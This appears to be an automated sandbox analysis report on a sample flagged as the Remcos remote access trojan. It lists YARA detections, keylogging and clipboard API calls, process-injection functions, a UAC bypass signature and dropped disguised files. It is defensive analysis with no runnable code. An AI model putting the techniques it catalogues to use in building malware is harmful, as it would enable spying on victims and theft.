Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320A2F3 SetWindowsHookExA 0000000D,0320A2DF,00000000 11_2_0320A2F3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard, 11_2_0320B749
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 11_2_032168FC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 21_2_02E968FC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 11_2_0320A41B
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321CA73 SystemParametersInfoW, 11_2_0321CA73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E9CA73 SystemParametersInfoW, 21_2_02E9CA73

System Summary

Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA8730 NtQueueApcThread, 0_2_02CA8730
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA7A2C NtAllocateVirtualMemory, 0_2_02CA7A2C
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02CADC8C
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02CADC04
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA7D78 NtWriteVirtualMemory, 0_2_02CA7D78
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02CADD70
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA8D6E GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02CA8D6E
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA8D70 GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02CA8D70
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA7A2A NtAllocateVirtualMemory, 0_2_02CA7A2A
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02CADBB0
Source: C:\Users\Public\alpha.pif Code function: 7_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 7_2_00054823
Source: C:\Users\Public\alpha.pif Code function: 7_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 7_2_0005643A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 7_2_00067460
Source: C:\Users\Public\alpha.pif Code function: 7_2_000564CA NtQueryInformationToken, 7_2_000564CA
Source: C:\Users\Public\alpha.pif Code function: 7_2_00056500 NtQueryInformationToken,NtQueryInformationToken, 7_2_00056500
Source: C:\Users\Public\alpha.pif Code function: 7_2_0006A135 NtSetInformationFile, 7_2_0006A135
Source: C:\Users\Public\alpha.pif Code function: 7_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 7_2_0006C1FA
Source: C:\Users\Public\alpha.pif Code function: 7_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 7_2_00044E3B
Source: C:\Users\Public\alpha.pif Code function: 7_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 7_2_00054759
Source: C:\Users\Public\alpha.pif Code function: 15_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 15_2_00054823
Source: C:\Users\Public\alpha.pif Code function: 15_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 15_2_0005643A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 15_2_00067460
Source: C:\Users\Public\alpha.pif Code function: 15_2_000564CA NtQueryInformationToken, 15_2_000564CA
Source: C:\Users\Public\alpha.pif Code function: 15_2_00056500 NtQueryInformationToken,NtQueryInformationToken, 15_2_00056500
Source: C:\Users\Public\alpha.pif Code function: 15_2_0006A135 NtSetInformationFile, 15_2_0006A135
Source: C:\Users\Public\alpha.pif Code function: 15_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 15_2_0006C1FA
Source: C:\Users\Public\alpha.pif Code function: 15_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 15_2_00044E3B
Source: C:\Users\Public\alpha.pif Code function: 15_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 15_2_00054759
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: 19_2_02C58730 NtQueueApcThread, 19_2_02C58730
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: 19_2_02C57A2C NtAllocateVirtualMemory, 19_2_02C57A2C
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: 19_2_02C5DD70 NtOpenFile,NtReadFile, 19_2_02C5DD70
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: 19_2_02C57D78 NtWriteVirtualMemory, 19_2_02C57D78
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: 19_2_02C57A2A NtAllocateVirtualMemory, 19_2_02C57A2A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00044C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z, 7_2_00044C10
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA8788 CreateProcessAsUserW, 0_2_02CA8788
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032167EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 11_2_032167EF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E967EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 21_2_02E967EF
Source: C:\Users\Public\alpha.pif File created: C:\Windows
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64
Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C920C4 0_2_02C920C4
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D3671B 0_2_02D3671B
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D3E42F 0_2_02D3E42F
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D4E5FA 0_2_02D4E5FA
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D3E9BE 0_2_02D3E9BE
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D6A93B 0_2_02D6A93B
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D64FD9 0_2_02D64FD9
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D4AF67 0_2_02D4AF67
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D3F067 0_2_02D3F067
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D3F1D0 0_2_02D3F1D0
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D35183 0_2_02D35183
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D556AC 0_2_02D556AC
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D6B769 0_2_02D6B769
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D5547D 0_2_02D5547D
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D2B595 0_2_02D2B595
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D55B38 0_2_02D55B38
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D558DB 0_2_02D558DB
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D5D800 0_2_02D5D800
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D4FD80 0_2_02D4FD80
Source: C:\Users\Public\alpha.pif Code function: 7_2_0004540A 7_2_0004540A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00044C10 7_2_00044C10
Source: C:\Users\Public\alpha.pif Code function: 7_2_00054875 7_2_00054875
Source: C:\Users\Public\alpha.pif Code function: 7_2_000474B1 7_2_000474B1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00049144 7_2_00049144
Source: C:\Users\Public\alpha.pif Code function: 7_2_0006695A 7_2_0006695A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00064191 7_2_00064191
Source: C:\Users\Public\alpha.pif Code function: 7_2_0004EE03 7_2_0004EE03
Source: C:\Users\Public\alpha.pif Code function: 7_2_00047A34 7_2_00047A34
Source: C:\Users\Public\alpha.pif Code function: 7_2_00046E57 7_2_00046E57
Source: C:\Users\Public\alpha.pif Code function: 7_2_00063E66 7_2_00063E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_0004D660 7_2_0004D660
Source: C:\Users\Public\alpha.pif Code function: 7_2_00055A86 7_2_00055A86
Source: C:\Users\Public\alpha.pif Code function: 7_2_0006769E 7_2_0006769E
Source: C:\Users\Public\alpha.pif Code function: 7_2_00053EB3 7_2_00053EB3
Source: C:\Users\Public\alpha.pif Code function: 7_2_00054EC1 7_2_00054EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00046B20 7_2_00046B20
Source: C:\Users\Public\alpha.pif Code function: 7_2_00050740 7_2_00050740
Source: C:\Users\Public\alpha.pif Code function: 7_2_00050BF0 7_2_00050BF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323E34B 11_2_0323E34B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032533AB 11_2_032533AB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03246270 11_2_03246270
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323E11C 11_2_0323E11C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321F18B 11_2_0321F18B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032381E8 11_2_032381E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032541D9 11_2_032541D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03214005 11_2_03214005
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323706A 11_2_0323706A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03238768 11_2_03238768
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032387F0 11_2_032387F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03237566 11_2_03237566
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323E5A8 11_2_0323E5A8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0322742E 11_2_0322742E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321DBF3 11_2_0321DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0324DA49 11_2_0324DA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03227AD7 11_2_03227AD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323797E 11_2_0323797E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032339D7 11_2_032339D7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03226E9F 11_2_03226E9F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03235EEB 11_2_03235EEB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323DEED 11_2_0323DEED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03237DB3 11_2_03237DB3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03227C40 11_2_03227C40
Source: C:\Users\Public\alpha.pif Code function: 15_2_0004540A 15_2_0004540A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00044C10 15_2_00044C10
Source: C:\Users\Public\alpha.pif Code function: 15_2_00054875 15_2_00054875
Source: C:\Users\Public\alpha.pif Code function: 15_2_000474B1 15_2_000474B1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00049144 15_2_00049144
Source: C:\Users\Public\alpha.pif Code function: 15_2_0006695A 15_2_0006695A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00064191 15_2_00064191
Source: C:\Users\Public\alpha.pif Code function: 15_2_0004EE03 15_2_0004EE03
Source: C:\Users\Public\alpha.pif Code function: 15_2_00047A34 15_2_00047A34
Source: C:\Users\Public\alpha.pif Code function: 15_2_00046E57 15_2_00046E57
Source: C:\Users\Public\alpha.pif Code function: 15_2_00063E66 15_2_00063E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_0004D660 15_2_0004D660
Source: C:\Users\Public\alpha.pif Code function: 15_2_00055A86 15_2_00055A86
Source: C:\Users\Public\alpha.pif Code function: 15_2_0006769E 15_2_0006769E
Source: C:\Users\Public\alpha.pif Code function: 15_2_00053EB3 15_2_00053EB3
Source: C:\Users\Public\alpha.pif Code function: 15_2_00054EC1 15_2_00054EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00046B20 15_2_00046B20
Source: C:\Users\Public\alpha.pif Code function: 15_2_00050740 15_2_00050740
Source: C:\Users\Public\alpha.pif Code function: 15_2_00050BF0 15_2_00050BF0
Source: C:\Users\Public\xpha.pif Code function: 16_2_000F1E26 16_2_000F1E26
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: 19_2_02C420C4 19_2_02C420C4
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: 19_2_02C4C95F 19_2_02C4C95F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EC6270 21_2_02EC6270
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02ED33AB 21_2_02ED33AB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EBE34B 21_2_02EBE34B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB706A 21_2_02EB706A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E94005 21_2_02E94005
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB81E8 21_2_02EB81E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02ED41D9 21_2_02ED41D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E9F18B 21_2_02E9F18B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EBE11C 21_2_02EBE11C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB87F0 21_2_02EB87F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EA742E 21_2_02EA742E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EBE5A8 21_2_02EBE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB7566 21_2_02EB7566
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EA7AD7 21_2_02EA7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02ECDA49 21_2_02ECDA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E9DBF3 21_2_02E9DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB39D7 21_2_02EB39D7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB797E 21_2_02EB797E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB5EEB 21_2_02EB5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EBDEED 21_2_02EBDEED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EA6E9F 21_2_02EA6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EA7C40 21_2_02EA7C40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB7DB3 21_2_02EB7DB3
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: String function: 02CA894C appears 56 times
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: String function: 02C944DC appears 74 times
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: String function: 02CA89D0 appears 45 times
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: String function: 02C946D4 appears 244 times
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: String function: 02C94860 appears 949 times
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: String function: 02C94500 appears 33 times
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: String function: 02D4C400 appears 45 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 03202093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 03234801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 02E82093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 02EB4801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 03201E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 03234E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 02EB4E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 02E81E65 appears 34 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: String function: 02C5894C appears 50 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: String function: 02C446D4 appears 155 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Code function: String function: 02C44860 appears 683 times
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
Source: nft438A5fN.exe Binary or memory string: OriginalFilename vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
